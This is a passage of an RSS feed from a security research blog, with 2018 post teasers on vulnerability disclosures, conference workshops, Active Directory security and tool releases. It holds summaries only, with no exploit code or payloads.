      <description>&lt;p&gt;With version 1.1.0 our tool DirectoryRanger introduces a new feature: informational audit checks. These checks do not have a severity rating because they are just “for your information” and the included information might or might not contain security issues, depending on other facts. But these checks can help to reduce your Active Directory attack surface by pointing you to some aspects which need your attention and at least require to be discussed and documented (and they might also imply governance measures like a risk acceptance).&lt;/p&gt;</description>
    </item>
    <item>
      <title>First Talks of TROOPERS19 Accepted!</title>
      <link>https://insinuator.net/2018/11/first-talks-of-troopers19-accepted/</link>
      <pubDate>Thu, 29 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/first-talks-of-troopers19-accepted/</guid>
      <description>&lt;p&gt;TROOPERS18 was the best year ever (did you check our &lt;a href=&#34;https://troopers.de/archives/&#34;&gt;archives&lt;/a&gt;?) and it will be challenging to do better… However, we accept the challenge!&lt;/p&gt;&#xA;&lt;p&gt;The trainings and talks were from high quality and choices were difficult to make… We hope you will enjoy reading these little teasers!&lt;/p&gt;&#xA;&lt;p&gt;Follow us on Twitter (&lt;a href=&#34;https://twitter.com/WEareTROOPERS&#34;&gt;@WEareTROOPERS&lt;/a&gt;) for more information and do not hesitate to use our hashtag #TR19 when you have questions or remarks about TROOPERS19!&lt;/p&gt;</description>
    </item>
    <item>
      <title>On the insecurity of math.random and it’s siblings</title>
      <link>https://insinuator.net/2018/11/on-the-insecurity-of-math.random-and-its-siblings/</link>
      <pubDate>Thu, 29 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/on-the-insecurity-of-math.random-and-its-siblings/</guid>
      <description>&lt;p&gt;During code reviews we often see developers using weak RNGs like &lt;em&gt;math.random()&lt;/em&gt; to generate cryptographic secrets. We think it is commonly known that weak random number generators (RNG) must not be used for any kind of secret and recommend using secure alternatives. I explicitly did not state a specific language yet, because basically every language offers both weak and strong RNGs.&lt;/p&gt;&#xA;&lt;p&gt;So I asked myself: What if I use a weak RNG to generate a secret? Is it possible to recover the secret from some derived value, like a hash?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Plume Twitter Client URL Spoofing</title>
      <link>https://insinuator.net/2018/11/plume-twitter-client-url-spoofing/</link>
      <pubDate>Fri, 23 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/plume-twitter-client-url-spoofing/</guid>
      <description>&lt;p&gt;It is possible to spoof the URLs that Plume will open to arbitrary locations because of how Plume parses URLs. The preview of an URL in a tweet will show the complete (at least the host name and the first few chars of the URL) but shortened URL. However, if the URL contains a semicolon (;) the URL that will be opened is the part after the semicolon.&lt;/p&gt;&#xA;&lt;p&gt;An attacker can make use of this behavior by specifying a URL like the following in a Tweet or direct message:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pidgin, Word Documents, my Clipboard and I</title>
      <link>https://insinuator.net/2018/11/pidgin-word-documents-my-clipboard-and-i/</link>
      <pubDate>Mon, 19 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/pidgin-word-documents-my-clipboard-and-i/</guid>
      <description>&lt;p&gt;Lately, I’ve experienced some weird &lt;a href=&#34;https://pidgin.im/&#34;&gt;Pidgin&lt;/a&gt; crashes when I was copy&amp;amp;pasting into chat windows. The strange part was: I didn’t even know what triggered the crash because I actually didn’t know what was in my clipboard at this exact point. This is a quick write-up of how I investigated the issue and some interesting properties I found out about clipboards.&lt;/p&gt;&#xA;&lt;p&gt;Everything started with a document that I was editing in a Windows VM in Microsoft Word. At some point, I wanted to copy some lines of the document and paste it into a Pidgin chat window on my Linux host system. As I did this, I noticed that when I pasted the data into the chat window it included a lot of white spaces. I thought something went wrong and just tried to delete it by pressing CTRL+A (to mark everything) and press BACKSPACE. But this caused Pidgin (2.13.0-5 on Arch Linux) to close with a segfault and created a core dump.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Dog Whisperer’s Handbook</title>
      <link>https://insinuator.net/2018/11/the-dog-whisperers-handbook/</link>
      <pubDate>Mon, 19 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/the-dog-whisperers-handbook/</guid>
      <description>&lt;p&gt;Generally speaking, I’m more of a Cat type of guy, but I have to say I really love BloodHound. And if you do too, you are in for a treat…&lt;br&gt;&#xA;Last week, the &lt;a href=&#34;https://twitter.com/ERNW_Insight&#34;&gt;ERNW Insight&lt;/a&gt; &lt;strong&gt;Active Directory Security Summit&lt;/strong&gt; took place in Heidelberg. (&lt;a href=&#34;https://insinuator.net/2018/11/active-directory-security-summit-2018-slides-online/&#34;&gt;More Info&lt;/a&gt;)&lt;br&gt;&#xA;For this occasion, &lt;a href=&#34;https://twitter.com/Enno_Insinuator&#34;&gt;@Enno_Insinuator&lt;/a&gt; asked me if I would like to deliver a &lt;strong&gt;BloodHound Workshop&lt;/strong&gt;, and of course I accepted the challenge…&lt;/p&gt;&#xA;&lt;p&gt;We had a full class, I had a blast training it, and I hope the trainees enjoyed it as much as I did.&lt;br&gt;&#xA;But that’s not all…&lt;br&gt;&#xA;Another part of the deal was that I had to write a &lt;strong&gt;Training Guide&lt;/strong&gt; that we would then &lt;strong&gt;share with the Community&lt;/strong&gt; (aka you).&lt;br&gt;&#xA;So here it is, fresh from the Heidelberg press and available for download:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Active Directory Security Summit 2018 – Slides Online</title>
      <link>https://insinuator.net/2018/11/active-directory-security-summit-2018-slides-online/</link>
      <pubDate>Fri, 16 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/active-directory-security-summit-2018-slides-online/</guid>
      <description>&lt;p&gt;on Tuesday, 13.th of November we realized our second AD security summit with the title: “&lt;a href=&#34;https://ernw-insight.de/de/events/2018-11-13-summit18-ad/&#34;&gt;Active Directory Security: On-Prem-Security, Secure Extension into the Cloud &amp;amp; Secure Operations&lt;/a&gt;” in Heidelberg. First, we had three talks: the first one about “&lt;a href=&#34;https://ernw.de/download/AD_Summit_2018/01_AD_Summit_CoreSecPrinciples_fk_hw_v.1.2_signed.pdf&#34;&gt;Active Directory Core Security Principles &amp;amp; Best Practices&lt;/a&gt;” covering hybrid AD and AD Trusts as well (by Friedwart Kuhn &amp;amp; Heinrich Wiederkehr from ERNW), the second one a case study about the &lt;a href=&#34;https://ernw.de/download/AD_Summit_2018/SecureAD_realWorldScenario_final.pdf&#34;&gt;implementation of an ESAE Forest in a big insurance company&lt;/a&gt; (by Fabian Böhm from &lt;a href=&#34;https://www.teal-consulting.de/&#34;&gt;Teal Technology Consulting&lt;/a&gt;) and the third one about a case study with respect to the (security) challenges of a hybrid AD (by Raphael Rojas from &lt;a href=&#34;https://www.stihl.de/&#34;&gt;STIHL&lt;/a&gt;). The afternoon passed quickly with a very fruitful and vivid discussion about implementing and operating securely ESAE environments and hybrid ADs and how to deal with the high number of AD Trusts many organisations suffer from. Today we published the slides. Enjoy and stay tuned!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dumping Decrypted Documents from a North Korean PDF Reader</title>
      <link>https://insinuator.net/2018/11/dumping-decrypted-documents-from-a-north-korean-pdf-reader/</link>
      <pubDate>Fri, 16 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/dumping-decrypted-documents-from-a-north-korean-pdf-reader/</guid>
      <description>&lt;p&gt;This is a write-up about how to use &lt;a href=&#34;https://www.frida.re/&#34;&gt;Frida&lt;/a&gt; to dump documents from a process after they have been loaded and decrypted. It’s a generic and very effective approach demonstrated on a piece of software from North Korea.&lt;/p&gt;&#xA;&lt;p&gt;Some time ago we received an ISO file which was a dump of a CD-ROM from North Korea. The only information we got was that it included a document viewer and various PDF documents. I started to dump the content of the ISO in order to analyze what the reader was actually doing by mounting it:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Multiple Vulnerabilities in Nexus Repository Manager</title>
      <link>https://insinuator.net/2018/11/multiple-vulnerabilities-in-nexus-repository-manager/</link>
      <pubDate>Wed, 14 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/multiple-vulnerabilities-in-nexus-repository-manager/</guid>
      <description>&lt;p&gt;Recently, we identified security issues in the Nexus Repository Manager software developed by Sonatype. The tested versions were OSS 3.12.1-01 and OSS 3.13.1-01.&lt;/p&gt;&#xA;&lt;p&gt;The following issues could be identified:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Multiple Cross-Site Scripting (&lt;a href=&#34;https://support.sonatype.com/hc/en-us/articles/360010789893-CVE-2018-16619-Nexus-Repository-Manager-XSS-October-17-2018&#34;&gt;CVE-2018-16619&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Missing Access Controls (&lt;a href=&#34;https://support.sonatype.com/hc/en-us/articles/360010789453-CVE-2018-16620-Nexus-Repository-Manager-Missing-Access-Controls-October-17-2018?_ga=2.232570207.1112299337.1542137786-592006867.1539786845&#34;&gt;CVE-2018-16620&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Java Expression Language Injection (&lt;a href=&#34;https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018?_ga=2.232570207.1112299337.1542137786-592006867.1539786845&#34;&gt;CVE-2018-16621&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;The vulnerabilities are fixed in version 3.14.0. See the &lt;a href=&#34;https://help.sonatype.com/repomanager3/release-notes/2018-release-notes#id-2018ReleaseNotes-RepositoryManager3.14.0&#34;&gt;release notes&lt;/a&gt; and &lt;a href=&#34;https://support.sonatype.com/hc/en-us/sections/203012668-Security-Advisories&#34;&gt;security advisories&lt;/a&gt;  for further information.&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;We identified a Java Expression Language Injection in the role and user creation function. In order to exploit this issue, the attacker needs to be authenticated with high privileges, the standard anonymous user is not sufficient.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hack.lu 2018: Back and forth with the ERNW Crew</title>
      <link>https://insinuator.net/2018/11/hack.lu-2018-back-and-forth-with-the-ernw-crew/</link>
      <pubDate>Tue, 13 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/hack.lu-2018-back-and-forth-with-the-ernw-crew/</guid>
      <description>&lt;p&gt;If a conference feels like a great vacation, then the organizers are doing it absolutely right! &lt;a href=&#34;https://hack.lu/&#34;&gt;Hack.lu&lt;/a&gt; took place for the 14th time in Luxembourg. From the 16th – 18th October, the Alvisse Parc Hotel hosted the Hack.lu conference. Those three days were full of talks, workshops and “discussions about computer security, privacy, information technology and its cultural/technical implication on society“. Some members of the ERNW crew had the chance to attend Hack.lu this year and we all enjoyed it a lot!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hack.lu 2018: Fuzzing Workshop by René Freingruber</title>
      <link>https://insinuator.net/2018/11/hack.lu-2018-fuzzing-workshop-by-ren%C3%A9-freingruber/</link>
      <pubDate>Tue, 06 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/hack.lu-2018-fuzzing-workshop-by-ren%C3%A9-freingruber/</guid>
      <description>&lt;p&gt;I was at the hack.lu conference in Luxembourg this year and attended the fuzzing workshop, held by &lt;a href=&#34;https://twitter.com/renefreingruber&#34;&gt;René Freingruber&lt;/a&gt; from &lt;a href=&#34;https://sec-consult.com/en/&#34;&gt;SEC Consult&lt;/a&gt;. I have been curious about this topic for some years now, but besides doing some manual fuzzing and web-fuzzing, I never looked into the whole topic that much.&lt;/p&gt;&#xA;&lt;p&gt;The workshop lasted for around four hours. Before the workshop started each student got two VMs (Linux/Windows) where everything necessary was already set up. The VMs included 23 exercises, with step-by-step explanations, source code and exploits. René started out with an introduction to fuzzing, listing popular fuzzers and showing an example on how to fuzz with &lt;a href=&#34;http://lcamtuf.coredump.cx/afl/&#34;&gt;afl&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>H2HC2018 – Attacking VMware NSX</title>
      <link>https://insinuator.net/2018/11/h2hc2018-attacking-vmware-nsx/</link>
      <pubDate>Fri, 02 Nov 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/11/h2hc2018-attacking-vmware-nsx/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://twitter.com/uchi_mata&#34;&gt;Matthias&lt;/a&gt; and &lt;a href=&#34;https://twitter.com/NodyTweet&#34;&gt;I&lt;/a&gt; had the pleasure to give a talk at the &lt;a href=&#34;https://www.h2hc.com.br/&#34;&gt;H2HC2018&lt;/a&gt; in São Paulo, Brazil about attacking VMware NSX. The talk is an introduction to VMware NSX for security researchers, and it discusses possible attack vectors including the management, controlling, and data exchange planes. We demonstrated how to prepare a fuzzing and debugging setup for the ESXi kernel and the kernel modules. It should be noted that &lt;a href=&#34;https://twitter.com/Syyyrius&#34;&gt;Olli&lt;/a&gt; was also supporting the research.&lt;br&gt;&#xA;The slides can be found &lt;a href=&#34;https://insinuator.net/wp-content/uploads/2018/11/H2HC_HarrieLuft_AttackingVMwareNSX-1.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hack.lu 2018: ARM IoT Firmware Emulation Workshop by Saumil Udayan Shah</title>
      <link>https://insinuator.net/2018/10/hack.lu-2018-arm-iot-firmware-emulation-workshop-by-saumil-udayan-shah/</link>
      <pubDate>Wed, 24 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/10/hack.lu-2018-arm-iot-firmware-emulation-workshop-by-saumil-udayan-shah/</guid>
      <description>&lt;p&gt;First day at &lt;a href=&#34;https://2018.hack.lu/&#34;&gt;hack.lu&lt;/a&gt;. Three of us kicked the conference off with the ARM IoT Firmware Emulation workshop by &lt;a href=&#34;https://twitter.com/therealsaumil&#34;&gt;Saumil&lt;/a&gt;. The goal of this workshop was not so much to write exploits or to pwn boxes but to learn how to build a beneficial research environment by emulating the hardware of a Linux based IoT device to run its firmware in order to run analysis and tests.&lt;/p&gt;&#xA;&lt;p&gt;First step is to obtain the firmware. This could be done by dumping it directly from the device or by downloading firmware images from the vendor. In order to dump the firmware from the device one has to obtain access to the underlying system which is usually done by finding the serial console on the hardware since this one often exposes an unauthenticated root shell. I think there is enough documentation online on how to identify and connect to a serial console so I won’t cover the details here. It’s also covered in Saumil’s &lt;a href=&#34;https://www.slideshare.net/saumilshah/hacklu-2018-make-arm-shellcode-great-again&#34;&gt;slides&lt;/a&gt; in detail. Having the bootup logs from this console will be helpful later though. While talking about baud rates for the serial console Saumil made a great pun I don’t want to withhold: “Most common is baud rate 115200. If you find a console with baud rate 9600 you are in fact talking to an acoustic coupler. That’s not an IoT device, it rather belongs to a museum.”&lt;/p&gt;</description>
    </item>
    <item>
      <title>Comparison of our tool afro (APFS file recovery) with Blackbag Blacklight and Sleuthkit</title>
      <link>https://insinuator.net/2018/10/comparison-of-our-tool-afro-apfs-file-recovery-with-blackbag-blacklight-and-sleuthkit/</link>
      <pubDate>Thu, 18 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/10/comparison-of-our-tool-afro-apfs-file-recovery-with-blackbag-blacklight-and-sleuthkit/</guid>
      <description>&lt;p&gt;At this years ARES conference, Jonas Plum (Siemens) and me (Andreas Dewald, ERNW Research GmbH) published a &lt;a href=&#34;https://dl.acm.org/citation.cfm?id=3232808&#34;&gt;paper&lt;/a&gt; about the forensic analysis of APFS, file system internals and presented different methodologies for file recovery. We also publicly released a tool implementing our presented approaches, called &lt;a href=&#34;https://github.com/cugu/afro&#34;&gt;afro&lt;/a&gt; (APFS file recovery).&lt;/p&gt;&#xA;&lt;p&gt;APFS is the file system for Apple devices that is used by default on all current iOS mobile devices, as well as macOS since High Sierra, and is thus currently rolled out on a large number of devices. By using afro, we evaluated and compared the different approaches amongst each other and identified the method that so far delivers the best results and compared it to photorec. This showed that AFRO outperforms photorec on the evaluated APFS dataset. In the presentations of this research we were often asked if other tools like Blackbags Blacklight do not already support this recovery process. So, we decided to compare the file recovery capabilities of BlackLight and afro. We wanted to compare afro to the sleuth kit as well, as at the DFRWS conference it was discussed about &lt;a href=&#34;https://www.dfrws.org/sites/default/files/session-files/pres_adding_apfs_support_to_the_sleuthkit_framework.pdf&#34;&gt;adding APFS Support to The Sleuthkit Framework&lt;/a&gt;, but no implementations are public yet.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Multiple Vulnerabilities in UNIFY OpenScape Desk Phone CP600</title>
      <link>https://insinuator.net/2018/10/multiple-vulnerabilities-in-unify-openscape-desk-phone-cp600/</link>
      <pubDate>Fri, 12 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/10/multiple-vulnerabilities-in-unify-openscape-desk-phone-cp600/</guid>
      <description>&lt;p&gt;We recently identified security issues in the UNIFY OpenScape Desk Phone CP600 HFA software. We disclosed the vulnerabilities to Unify, as a fix is now provided we want to give a brief overview of the vulnerability affecting the web interface.&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;We were able to identify the following vulnerabilities in the Web interface of the telephone:&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Command Injection in Picture Delete function of OpenScape Desk Phone Webportal&lt;/li&gt;&#xA;&lt;li&gt;Unauthenticated Arbitrary File Access in the OpenScape Desk Phone Webportal&lt;/li&gt;&#xA;&lt;li&gt;Memory Corruption in the OpenScape Desk Phone Webservice&lt;/li&gt;&#xA;&lt;li&gt;Missing Hardening of the OpenScape Desk Phone Webservice Binary&lt;/li&gt;&#xA;&lt;li&gt;Cross Site Request Forgery Missing in the OpenScape Desk Phone Webservice&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>Incident Analysis and Digital Forensics Summit 2018, 14th of November of 2018</title>
      <link>https://insinuator.net/2018/10/incident-analysis-and-digital-forensics-summit-2018-14th-of-november-of-2018/</link>
      <pubDate>Mon, 08 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/10/incident-analysis-and-digital-forensics-summit-2018-14th-of-november-of-2018/</guid>
      <description>&lt;p&gt;*This event will be held in German*&lt;/p&gt;&#xA;&lt;p&gt;Inspiriert durch die erfolgreichen Round-Table-Diskussionen der Troopers-Konferenz freuen wir uns, Ihnen heute mit dem Incident Analysis and Digital Forensics Summit 2018, eine weitere Veranstaltung in einer Reihe zu Trend-Themen im Bereich der IT-Sicherheit vorzustellen.&lt;/p&gt;&#xA;&lt;p&gt;Die Veranstaltung beginnt am Morgen mit einem Eröffnungsvortrag von Thomas Schreck (Chairman of the Board des internationalen CERT Verbunds FIRST), gefolgt von Fallstudien und Vorträgen durch weitere Referenten aus der Industrie und Strafverfolgung.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerabilities in Sitefinity WCMS – A Success Story of a Responsible Disclosure Process</title>
      <link>https://insinuator.net/2018/10/vulnerabilities-in-sitefinity-wcms-a-success-story-of-a-responsible-disclosure-process/</link>
      <pubDate>Mon, 08 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/10/vulnerabilities-in-sitefinity-wcms-a-success-story-of-a-responsible-disclosure-process/</guid>
      <description>&lt;h1 id=&#34;preface&#34;&gt;Preface&lt;/h1&gt;&#xA;&lt;p&gt;For those who never heard of &lt;em&gt;Sitefinity&lt;/em&gt; before, it is an &lt;em&gt;ASP.NET&lt;/em&gt;-based Web Content Management System (&lt;em&gt;WCMS&lt;/em&gt;), which is used to deploy and manage applications as other &lt;em&gt;CMS&lt;/em&gt;‘s do. A bitter quick glance at &lt;em&gt;Sitefinity&lt;/em&gt; and its advantages can be found in this &lt;a href=&#34;https://www.progress.com/documentation/sitefinity-cms/sitefinity-overview&#34;&gt;overview.&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Delving into the core of this blog post, recently I had the opportunity to look at &lt;em&gt;Sitefinity WCMS&lt;/em&gt; in which I found two &lt;em&gt;reflected&lt;/em&gt; &lt;em&gt;Cross Site Scripting&lt;/em&gt; (&lt;em&gt;XSS&lt;/em&gt;) (&lt;em&gt;&lt;a href=&#34;https://www.cvedetails.com/cve/CVE-2018-17053/&#34; title=&#34;CVE-2018-17053 security vulnerability details&#34;&gt;CVE-2018-17053&lt;/a&gt; and &lt;a href=&#34;https://www.cvedetails.com/cve/CVE-2018-17056/&#34; title=&#34;CVE-2018-17056 security vulnerability details&#34;&gt;CVE-2018-17056&lt;/a&gt;&lt;/em&gt;), a* stored XSS* (&lt;em&gt;&lt;a href=&#34;https://www.cvedetails.com/cve/CVE-2018-17054/&#34; title=&#34;CVE-2018-17054 security vulnerability details&#34;&gt;CVE-2018-17054&lt;/a&gt;&lt;/em&gt;) and an arbitrary file upload (&lt;a href=&#34;https://www.cvedetails.com/cve/CVE-2018-17055/&#34; title=&#34;CVE-2018-17055 security vulnerability details&#34;&gt;&lt;em&gt;CVE-2018-17055&lt;/em&gt;&lt;/a&gt;) vulnerabilities.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Spraying arbitrary objects into the non-paged pool</title>
      <link>https://insinuator.net/2018/10/spraying-arbitrary-objects-into-the-non-paged-pool/</link>
      <pubDate>Wed, 03 Oct 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/10/spraying-arbitrary-objects-into-the-non-paged-pool/</guid>
      <description>&lt;p&gt;Recently, I had some time to play around with HEVD [&lt;a href=&#34;https://github.com/hacksysteam/HackSysExtremeVulnerableDriver&#34;&gt;1&lt;/a&gt;], an extremly vulnerable Windows driver available for 32-bit and 64-bit systems.&lt;/p&gt;&#xA;&lt;p&gt;Since exploits for all vulnerabilities of the 32-bit variant are publically available, I was wondering why this is not the case for the 64-bit version, especially for the pool corruption and UAF vulnerabilities.&lt;/p&gt;&#xA;&lt;p&gt;After digging around a bit, it turned out that the reason is the following. HEVD uses a “special” sized object which is improperly handled such that a Use-After-Free vulnerability arises.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Active Directory Security Summit 2018, 13th. of November of 2018</title>
      <link>https://insinuator.net/2018/09/active-directory-security-summit-2018-13th.-of-november-of-2018/</link>
      <pubDate>Mon, 03 Sep 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/09/active-directory-security-summit-2018-13th.-of-november-of-2018/</guid>
      <description>&lt;p&gt;I have the pleasure to announce the Active Directory Security Summit 2018 at 13^(th). of November of 2018. The summit covers current Active Directory security related topics such as challenging tasks of hybrid Active Directory operations as well as new security best practices and some ‘evergreens’ – Admin Tiering implementations (what about Exchange and DNS…??), ESAE operations etc. 😉&lt;/p&gt;&#xA;&lt;p&gt;The primary objective of the Active Directory Security Summit is to bring experts together:&lt;/p&gt;</description>
    </item>
    <item>
      <title>nmap-parse-output: A tool for analyzing Nmap scans</title>
      <link>https://insinuator.net/2018/08/nmap-parse-output-a-tool-for-analyzing-nmap-scans/</link>
      <pubDate>Fri, 24 Aug 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/08/nmap-parse-output-a-tool-for-analyzing-nmap-scans/</guid>
      <description>&lt;p&gt;&lt;strong&gt;tl;dr:&lt;/strong&gt; With the tool &lt;a href=&#34;https://github.com/ernw/nmap-parse-output&#34;&gt;nmap-parse-output&lt;/a&gt; you can &lt;a href=&#34;https://github.com/ernw/nmap-parse-output#usage&#34;&gt;convert, manipulate or extract data&lt;/a&gt; from a Nmap/masscan scan output. This allows you to &lt;a href=&#34;https://github.com/ernw/nmap-parse-output#examples&#34;&gt;get the information&lt;/a&gt; you’re looking for by just entering a &lt;a href=&#34;https://github.com/ernw/nmap-parse-output#usage&#34;&gt;straightforward command&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h2 id=&#34;preamble&#34;&gt;Preamble&lt;/h2&gt;&#xA;&lt;p&gt;A while ago, we had to scan a mass amount of IPs within a project for a customer. While it’s feasible to read the whole output of a Nmap scan if you have just a few alive hosts, this was not possible anymore for this mass amount of systems. We’ve started with a &lt;a href=&#34;https://github.com/robertdavidgraham/masscan&#34;&gt;masscan&lt;/a&gt; to scan all 2^16 ports of the IP ranges and wanted to perform a more precise analysis of the alive hosts (which had responded to at least one SYN packet) with Nmap. The result of this scan grew to nearly a hundred megabyte and we now had to do an analysis of which ports we had to look deeper into and which are intended to be open.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A few notes on WordPress Security</title>
      <link>https://insinuator.net/2018/08/a-few-notes-on-wordpress-security/</link>
      <pubDate>Wed, 22 Aug 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/08/a-few-notes-on-wordpress-security/</guid>
      <description>&lt;p&gt;Taking a look at the &lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress&#34;&gt;CVE List for WordPress&lt;/a&gt;, most vulnerabilities aren’t found within the WordPress core but inside of third-party plugins and themes.&lt;/p&gt;&#xA;&lt;p&gt;Today, let’s talk about WordPress.&lt;/p&gt;&#xA;&lt;p&gt;Performing a WordPress assessment might seem boring at first as core functionality [tested] and configuration does not allow for extensive security misconfigurations. Luckily, most instances use plugins and themes to add features not offered by the WordPress core.&lt;/p&gt;&#xA;&lt;p&gt;In this blog post I would like to discuss the findings and how I discovered them. Also, I will describe different vendor responsiveness reaching from not responding at all, to not understanding the issue to fast and professional responses kindly asking for a review of the updated code ready for deployment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPython Support for Binary Ninja</title>
      <link>https://insinuator.net/2018/08/ipython-support-for-binary-ninja/</link>
      <pubDate>Fri, 17 Aug 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/08/ipython-support-for-binary-ninja/</guid>
      <description>&lt;p&gt;This blogpost is about the release of a plugin for Binary Ninja that allows you to run a Python Kernel inside the Binary Ninja GUI environment to which you can attach a Jupyer (QT) console, formerly known as IPython shell. The first section is about why this is useful, the second is about some issues I encountered and how to solve them, and the third contains everything you need to know to set it up.&lt;/p&gt;</description>
    </item>
    <item>
      <title>dizzy version 2.0 released</title>
      <link>https://insinuator.net/2018/08/dizzy-version-2.0-released/</link>
      <pubDate>Fri, 03 Aug 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/08/dizzy-version-2.0-released/</guid>
      <description>&lt;p&gt;A new major version of our fuzzing framework &lt;em&gt;dizzy&lt;/em&gt; has been released.&lt;/p&gt;&#xA;&lt;p&gt;This blog post will cover the biggest changes and new features, as well as give you a short introduction into how to use them.&lt;/p&gt;&#xA;&lt;p&gt;You can find the new version on &lt;a href=&#34;https://github.com/ernw/dizzy&#34;&gt;github&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h3 id=&#34;installation&#34;&gt;Installation&lt;/h3&gt;&#xA;&lt;p&gt;There are two supported ways of installing dizzy:&lt;/p&gt;&#xA;&lt;p&gt;via pypi&lt;br&gt;&#xA;&lt;code&gt;$ pip install dizzy&lt;/code&gt;&lt;br&gt;&#xA;via setup.py&lt;br&gt;&#xA;&lt;code&gt;$ git clone https://https://github.com/ernw/dizzy &amp;amp;&amp;amp; cd dizzy &amp;amp;&amp;amp; python setup.py install&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Diversity, Community, Blackhoodie</title>
      <link>https://insinuator.net/2018/07/diversity-community-blackhoodie/</link>
      <pubDate>Thu, 26 Jul 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/07/diversity-community-blackhoodie/</guid>
      <description>&lt;p&gt;Gender equality in the Infosec world as a topic of discussion comes with a lot of heated arguments and differences in opinion.&lt;br&gt;&#xA;So let me start with some disclaimers on the target audience for this post. If you are in the category who believes everything about gender is perfect in the infosec world, this post is not for you. If you are in the category who believes gender and bringing diversity is not your area of interest, then this post is not for you either. There are so many interesting problems that the world offers you. Climate change, poverty, diseases, unemployment, addiction, science problems and what not. Everybody has the freedom to choose their area of interest and contribute towards it. If you are in the category who thinks gender equality in infosec needs some attention and would like to explore more on the topic without prejudices, then this post may  be interesting to you.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A little KeePass Mea Culpa…</title>
      <link>https://insinuator.net/2018/07/a-little-keepass-mea-culpa/</link>
      <pubDate>Mon, 23 Jul 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/07/a-little-keepass-mea-culpa/</guid>
      <description>&lt;p&gt;Some weeks ago, I tweeted about grabbing clipboard content from KeePass with some PowerShell. From some reactions to this tweet, and after reading it a couple of times again, I realize it was sending the wrong message, and I would like to take a bit more than 280 chars to clarify what I meant when I posted that tweet…&lt;/p&gt;&#xA;&lt;p&gt;TLDR: Password managers are a must, not using one exposes you to far more risks than using one. Do it. &lt;/p&gt;</description>
    </item>
    <item>
      <title>PoSh_ATTCK – ATT&amp;amp;CK Knowledge at your PowerShell Fingertips…</title>
      <link>https://insinuator.net/2018/07/posh_attck-attampck-knowledge-at-your-powershell-fingertips/</link>
      <pubDate>Sat, 07 Jul 2018 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2018/07/posh_attck-attampck-knowledge-at-your-powershell-fingertips/</guid>
